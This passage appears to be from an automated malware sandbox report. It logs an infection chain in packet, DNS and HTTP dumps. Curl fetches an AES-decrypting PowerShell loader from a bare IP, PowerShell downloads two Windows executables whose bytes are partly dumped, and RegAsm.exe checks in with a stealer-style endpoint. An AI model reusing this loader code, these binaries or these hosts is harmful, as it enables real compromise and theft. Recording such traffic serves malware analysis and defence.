                                                                                                      Dec 20, 2024 07:18:13.550451040 CET44349741172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:13.550592899 CET49741443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:13.550949097 CET49741443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:13.550987959 CET44349741172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:14.764086962 CET44349741172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:14.764170885 CET49741443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:14.765686035 CET49741443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:14.765717030 CET44349741172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:14.765940905 CET44349741172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:14.767107010 CET49741443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:14.767337084 CET49741443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:14.767388105 CET44349741172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:14.767601967 CET49741443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:14.767620087 CET44349741172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:15.737467051 CET44349741172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:15.737540007 CET44349741172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:15.737776041 CET49741443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:15.738102913 CET49741443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:15.738172054 CET44349741172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:15.825089931 CET49743443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:15.825191975 CET44349743172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:15.825280905 CET49743443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:15.825952053 CET49743443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:15.826037884 CET44349743172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:17.038539886 CET44349743172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:17.038615942 CET49743443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:17.046626091 CET49743443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:17.046655893 CET44349743172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:17.046876907 CET44349743172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:17.048909903 CET49743443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:17.049041033 CET49743443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:17.049053907 CET44349743172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:17.801275015 CET44349743172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:17.801351070 CET44349743172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:17.801425934 CET49743443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:17.801654100 CET49743443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:17.801696062 CET44349743172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:18.213052988 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:18.213099957 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:18.213182926 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:18.213620901 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:18.213639975 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.432560921 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.432678938 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.434490919 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.434510946 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.435585976 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.437182903 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.438297987 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.438370943 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.438548088 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.438608885 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.442142010 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.442233086 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.442351103 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.442383051 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.442461967 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.442476034 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.442501068 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.442516088 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.442572117 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.442591906 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.442625999 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.442648888 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.442744017 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.442760944 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.442823887 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.442914963 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.442920923 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.442949057 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.443021059 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:19.445142031 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.445199966 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.445219040 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.466522932 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:19.466542006 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:23.186966896 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:23.187088013 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:23.187171936 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:23.187418938 CET49745443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:23.187438965 CET44349745172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:23.192506075 CET49750443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:23.192605019 CET44349750172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:23.192711115 CET49750443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:23.193108082 CET49750443192.168.2.4172.67.197.170
                                                                                                      Dec 20, 2024 07:18:23.193147898 CET44349750172.67.197.170192.168.2.4
                                                                                                      Dec 20, 2024 07:18:23.912823915 CET49750443192.168.2.4172.67.197.170
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 20, 2024 07:18:03.910798073 CET6081553192.168.2.41.1.1.1
                                                                                                      Dec 20, 2024 07:18:04.135057926 CET53608151.1.1.1192.168.2.4
                                                                                                      Dec 20, 2024 07:18:04.143228054 CET6530753192.168.2.41.1.1.1
                                                                                                      Dec 20, 2024 07:18:04.620106936 CET53653071.1.1.1192.168.2.4
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Dec 20, 2024 07:18:03.910798073 CET192.168.2.41.1.1.10xafc0Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                      Dec 20, 2024 07:18:04.143228054 CET192.168.2.41.1.1.10xc47dStandard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Dec 20, 2024 07:18:04.135057926 CET1.1.1.1192.168.2.40xafc0Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                      Dec 20, 2024 07:18:04.620106936 CET1.1.1.1192.168.2.40xc47dNo error (0)discokeyus.lat172.67.197.170A (IP address)IN (0x0001)false
                                                                                                      Dec 20, 2024 07:18:04.620106936 CET1.1.1.1192.168.2.40xc47dNo error (0)discokeyus.lat104.21.21.99A (IP address)IN (0x0001)false
                                                                                                      • discokeyus.lat
                                                                                                      • 147.45.44.131
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449730147.45.44.131804008C:\Windows\SysWOW64\curl.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 20, 2024 07:17:58.501565933 CET195OUTGET /infopage/bhgto.ps1 HTTP/1.1
                                                                                                      Host: 147.45.44.131
                                                                                                      User-Agent: curl/7.83.1
                                                                                                      Accept: */*
                                                                                                      X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                                      Dec 20, 2024 07:17:59.722228050 CET1236INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 20 Dec 2024 06:17:59 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      Last-Modified: Tue, 17 Dec 2024 21:00:53 GMT
                                                                                                      ETag: "5ca-6297d97b903a6"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 1482
                                                                                                      Data Raw: 0d 0a 24 48 77 20 3d 20 27 74 71 77 32 51 52 6d 5a 30 70 66 58 44 66 61 4e 4d 4e 31 36 67 52 32 61 43 49 68 76 37 41 6d 4d 58 7a 4f 48 6c 67 2b 53 77 63 51 3d 27 0d 0a 24 79 79 20 3d 20 27 32 33 45 74 41 58 4f 7a 39 50 44 2b 30 52 4a 36 57 62 6d 49 78 77 3d 3d 27 0d 0a 24 31 58 20 3d 20 27 69 7a 48 6f 69 6c 50 51 54 7a 6d 4a 52 57 4c 62 7a 2f 4f 73 6c 74 2f 66 39 52 51 42 64 59 6e 45 65 59 6d 32 68 50 35 67 63 58 58 2f 66 45 62 44 43 7a 66 63 33 66 69 55 68 6b 5a 48 6a 54 72 69 38 41 42 56 4c 47 39 4f 58 34 53 71 74 69 72 59 43 46 7a 7a 53 67 6f 73 66 6e 6b 78 64 6f 4d 48 33 74 52 6d 34 32 64 43 4f 45 42 45 4d 35 57 78 54 36 36 7a 38 75 72 6d 6e 6b 72 7a 49 73 32 63 73 4b 48 41 54 47 43 79 65 6f 65 53 38 31 34 72 38 47 71 35 34 63 46 30 5a 58 5a 4a 2b 48 47 63 46 51 4f 6d 4c 78 6c 37 71 61 78 33 41 76 64 6f 6d 57 71 53 47 2b 63 78 73 6e 32 67 4a 46 52 69 49 33 7a 76 4b 66 4c 5a 2f 54 45 6a 65 30 4f 48 33 68 49 61 2b 75 44 31 56 62 52 63 57 2b 31 6a 2f 6d 4e 62 4a 72 2b 45 55 51 77 6c 35 67 6a 51 6e [TRUNCATED]
                                                                                                      Data Ascii: $Hw = 'tqw2QRmZ0pfXDfaNMN16gR2aCIhv7AmMXzOHlg+SwcQ='$yy = '23EtAXOz9PD+0RJ6WbmIxw=='$1X = 'izHoilPQTzmJRWLbz/Oslt/f9RQBdYnEeYm2hP5gcXX/fEbDCzfc3fiUhkZHjTri8ABVLG9OX4SqtirYCFzzSgosfnkxdoMH3tRm42dCOEBEM5WxT66z8urmnkrzIs2csKHATGCyeoeS814r8Gq54cF0ZXZJ+HGcFQOmLxl7qax3AvdomWqSG+cxsn2gJFRiI3zvKfLZ/TEje0OH3hIa+uD1VbRcW+1j/mNbJr+EUQwl5gjQnLzUSoY/77z1fh9eW+YNABrrh2khkRY8do5aC9yyFy94uFNRyXzDZt+Bu3nNFJmgzz3t9Mag43tNfMXOe8RSQ56TkjA1hyIK+MGn3dEG6lkkLeMm4ptyGm/UAJf/yWLxaG1ABIwQVpQ5ol8zggdFz2DRSqZKZ2HrdTkBrbP3ZSkQD21AUvzNo4AEFFFg+5yunM6guI1c2K9TiAuJQNH34k+DkACAqt4Tqu+rD2vY8O9sBp6dEJf56p+03D63zwZ1GxMGyml23IsasVo2esx/t+ZoLR/ixMycjV0/Dtsj89AMX/DpRI28SbRgvHlSO/pzhKEOuXZVcvv3cT1upvxiaBQcv1jR5ExZjio7jc1rBWoGdbSunl9T0Ss6h5c='function sa ($k4, $Hw, $yy) { $8L = [Convert]::FromBase64String($Hw) $0q = [Convert]::FromBase64String($yy) $II = [Convert]::FromBase64String($k4) $so = [System.Security.Cryptography.Aes]::Create() $so.Key = $8L $so.IV = $0q $so.Padding = [System.Security [TRUNCATED]
                                                                                                      Dec 20, 2024 07:17:59.722258091 CET451INData Raw: 6e 67 4d 6f 64 65 5d 3a 3a 50 4b 43 53 37 0d 0a 20 20 20 20 24 31 4a 20 3d 20 24 73 6f 2e 43 72 65 61 74 65 44 65 63 72 79 70 74 6f 72 28 24 73 6f 2e 4b 65 79 2c 20 24 73 6f 2e 49 56 29 0d 0a 20 20 20 20 24 43 31 20 3d 20 4e 65 77 2d 4f 62 6a 65
                                                                                                      Data Ascii: ngMode]::PKCS7 $1J = $so.CreateDecryptor($so.Key, $so.IV) $C1 = New-Object System.IO.MemoryStream(, $II) $Pb = New-Object System.Security.Cryptography.CryptoStream($C1, $1J, [System.Security.Cryptography.CryptoStreamMode]::Read)


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449733147.45.44.131807100C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 20, 2024 07:18:00.499728918 CET180OUTGET /infopage/knhy.exe HTTP/1.1
                                                                                                      X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                                      Host: 147.45.44.131
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 20, 2024 07:18:01.761307955 CET1236INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 20 Dec 2024 06:18:01 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      Last-Modified: Tue, 17 Dec 2024 20:57:01 GMT
                                                                                                      ETag: "b200-6297d89e9c02c"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 45568
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-msdos-program
                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 bb 4b a7 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0c 00 00 00 00 00 00 ee c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c c3 00 00 4f 00 00 00 00 e0 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 80 c3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK"0 @ `O H.text `.rsrc@@.reloc@BH"0S(rp(o(r3p(os%oo~o~(*(*0(rp(o(~((osso(rp(oo&o(r-p(oo&o%oo(rWp(oo(rqp(oo%%o &
                                                                                                      Dec 20, 2024 07:18:01.761365891 CET1236INData Raw: 2a 1e 02 28 16 00 00 0a 2a 00 13 30 05 00 66 00 00 00 03 00 00 11 28 21 00 00 0a 03 6f 22 00 00 0a 0a 02 02 8e 69 17 59 91 1f 70 61 0b 02 8e 69 8d 20 00 00 01 0c 16 0d 16 13 04 2b 28 08 11 04 02 11 04 91 07 61 06 09 91 61 d2 9c 09 03 6f 23 00 00
                                                                                                      Data Ascii: *(*0f(!o"iYpai +(aao#Y3+XXiY2iY(+*(*(*(*(*0L(rp(o(rp(o(rp(o
                                                                                                      Dec 20, 2024 07:18:01.761403084 CET248INData Raw: 00 00 00 00 92 00 3f 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 92 00 97 02 00 00 00 00 49 00 8e 00 00 00 00 4b 31 00 50 31 00 43 6f 6e 73 6f 6c 65 41 70 70 36 36 00 67 65 74 5f 55 54 46 38 00 3c 4d 6f 64 75 6c 65 3e 00 44 6f 77 6e 6c 6f
                                                                                                      Data Ascii: ?IK1P1ConsoleApp66get_UTF8<Module>DownloadDataEncryptDatamscorlibAddSystem.Collections.SpecializedGetMethodCompileAssemblyFromSourceget_BigEndianUnicodeInvokeGetTypeMethodBaseGuidAttributeD
                                                                                                      Dec 20, 2024 07:18:01.761434078 CET1236INData Raw: 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 72 69 62 75 74
                                                                                                      Data Ascii: ableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProdu
                                                                                                      Dec 20, 2024 07:18:01.761468887 CET1236INData Raw: 00 58 00 46 00 51 00 61 00 55 00 78 00 6f 00 53 00 6e 00 45 00 3d 00 00 c0 00 92 f9 52 00 6a 00 42 00 56 00 59 00 32 00 46 00 42 00 56 00 56 00 64 00 4e 00 56 00 54 00 68 00 53 00 52 00 6d 00 78 00 4e 00 57 00 56 00 42 00 58 00 4f 00 44 00 68 00
                                                                                                      Data Ascii: XFQaUxoSnE=RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZE
                                                                                                      Dec 20, 2024 07:18:01.761504889 CET448INData Raw: 61 00 46 00 6c 00 53 00 52 00 6d 00 78 00 6a 00 53 00 47 00 4e 00 70 00 64 00 46 00 6c 00 43 00 62 00 45 00 31 00 68 00 55 00 33 00 70 00 30 00 4c 00 30 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 7a 00 46 00 32 00 59 00 55 00 4a 00 61 00 56 00
                                                                                                      Data Ascii: aFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSG
                                                                                                      Dec 20, 2024 07:18:01.761538029 CET1236INData Raw: 55 00 6a 00 52 00 4d 00 52 00 45 00 56 00 4b 00 56 00 6d 00 4e 00 42 00 54 00 6d 00 46 00 47 00 4d 00 55 00 35 00 4d 00 59 00 6e 00 70 00 34 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 48 00 56 00 48 00 52 00 76 00 55 00 57 00 68 00 61 00 56 00
                                                                                                      Data Ascii: UjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVk
                                                                                                      Dec 20, 2024 07:18:01.761574030 CET1236INData Raw: 4d 00 79 00 5a 00 31 00 64 00 52 00 61 00 46 00 70 00 44 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 70 00 42 00 54 00 6c 00 5a 00 72 00 51 00 30 00 31 00 47 00 57 00 6e 00 68 00 43 00 4d 00 45 00 6b 00
                                                                                                      Data Ascii: MyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRX
                                                                                                      Dec 20, 2024 07:18:01.761606932 CET1236INData Raw: 55 00 32 00 34 00 34 00 59 00 6d 00 4e 00 71 00 53 00 6b 00 4e 00 46 00 51 00 6c 00 6c 00 4c 00 51 00 54 00 46 00 6e 00 55 00 6d 00 46 00 6e 00 59 00 32 00 5a 00 58 00 56 00 48 00 52 00 76 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 6f 00 53 00
                                                                                                      Data Ascii: U244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NV
                                                                                                      Dec 20, 2024 07:18:01.761643887 CET1236INData Raw: 4a 00 52 00 62 00 46 00 56 00 4f 00 52 00 45 00 56 00 4a 00 55 00 57 00 5a 00 6f 00 57 00 57 00 5a 00 58 00 56 00 48 00 52 00 76 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 6f 00 53 00 6b 00 56 00 44 00 4d 00 45 00 46 00 45 00 52 00 6d 00 78 00
                                                                                                      Data Ascii: JRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0
                                                                                                      Dec 20, 2024 07:18:01.881292105 CET1236INData Raw: 56 00 46 00 6c 00 42 00 5a 00 45 00 56 00 55 00 61 00 46 00 6c 00 4d 00 52 00 45 00 56 00 4b 00 56 00 6c 00 70 00 43 00 5a 00 46 00 46 00 43 00 52 00 6b 00 31 00 52 00 54 00 56 00 59 00 34 00 55 00 46 00 6b 00 77 00 4e 00 46 00 64 00 46 00 52 00
                                                                                                      Data Ascii: VFlBZEVUaFlMREVKVlpCZFFCRk1RTVY4UFkwNFdFRk1FUWw4YmNrSlVHMElIRVdRUVp3WWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbU
                                                                                                      Dec 20, 2024 07:18:02.204627037 CET156OUTGET /infopage/bnkh.exe HTTP/1.1
                                                                                                      X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                                      Host: 147.45.44.131
                                                                                                      Dec 20, 2024 07:18:02.604983091 CET1236INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 20 Dec 2024 06:18:02 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      Last-Modified: Tue, 17 Dec 2024 20:55:22 GMT
                                                                                                      ETag: "49c00-6297d83faa710"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 302080
                                                                                                      Content-Type: application/x-msdos-program
                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d [TRUNCATED]
                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gP@`@ 8.text6 `.rdata "@@.data0P@.reloc8 :b@B


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449736172.67.197.1704437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-20 06:18:05 UTC261OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 8
                                                                                                      Host: discokeyus.lat
                                                                                                      2024-12-20 06:18:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                      Data Ascii: act=life
                                                                                                      2024-12-20 06:18:06 UTC1132INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 20 Dec 2024 06:18:06 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=l1clqa1q65112ntrlnnr5qob2p; expires=Tue, 15 Apr 2025 00:04:45 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2FZgZUBunt%2FMcfiJZWlKJyaztzsoKSdA24yXiQ4%2BdnLe5YfRA12G86iPzqSGDySaleQf2LLH3qmatSajWqM%2BH0acwDOa7kZ63%2FlPfH3eLfAqzYz8W8Jv%2BBZWXGCVblGgFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f4d835c5d6e43e3-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2559&min_rtt=2246&rtt_var=1066&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1300089&cwnd=229&unsent_bytes=0&cid=8e49f1373b498f01&ts=739&x=0"
                                                                                                      2024-12-20 06:18:06 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                      Data Ascii: 2ok
                                                                                                      2024-12-20 06:18:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449738172.67.197.1704437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-20 06:18:07 UTC262OUTPOST /api HTTP/1.1
